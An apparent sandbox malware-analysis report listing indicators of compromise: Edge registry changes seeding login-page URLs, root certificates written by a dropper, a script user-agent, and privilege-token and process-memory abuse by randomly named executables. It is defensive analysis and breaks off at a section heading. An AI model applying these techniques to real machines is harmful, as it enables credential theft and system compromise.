MicrosoftEdge.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe -
Processes:
Fri051e1e7444.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Fri051e1e7444.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Fri051e1e7444.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 559 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 569 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri051e1e7444.exeAgGOSclM3apmo74sb5reIH3y.exepid process 692 Fri051e1e7444.exe 692 Fri051e1e7444.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3032 -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
TrvPKMajtMffCi7iitJBZDnB.exezObJUR9EVjyfYx_qv35UyzNe.exeA53B.exe19D1.exepid process 2524 TrvPKMajtMffCi7iitJBZDnB.exe 5124 zObJUR9EVjyfYx_qv35UyzNe.exe 3952 A53B.exe 6004 19D1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
W1bYeEIYUUPaZDtUMFaYTrWG.execmd.exer3FYzQQodjD253E15m9ZD5ze.exeWerFault.exeDownFlSetup999.exedescription pid process Token: SeCreateTokenPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeAssignPrimaryTokenPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeLockMemoryPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeIncreaseQuotaPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeMachineAccountPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeTcbPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSecurityPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeTakeOwnershipPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeLoadDriverPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSystemProfilePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSystemtimePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeProfSingleProcessPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeIncBasePriorityPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeCreatePagefilePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeCreatePermanentPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeBackupPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeRestorePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeShutdownPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeDebugPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeAuditPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSystemEnvironmentPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeChangeNotifyPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeRemoteShutdownPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeUndockPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSyncAgentPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeEnableDelegationPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeManageVolumePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeImpersonatePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeCreateGlobalPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 31 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 32 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 33 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 34 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 35 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeRestorePrivilege 4376 cmd.exe Token: SeBackupPrivilege 4376 cmd.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeDebugPrivilege 1784 r3FYzQQodjD253E15m9ZD5ze.exe Token: SeDebugPrivilege 4376 cmd.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeDebugPrivilege 4980 WerFault.exe Token: SeDebugPrivilege 4868 DownFlSetup999.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3032 3032 -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
MicrosoftEdge.exepid process 3032 4736 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
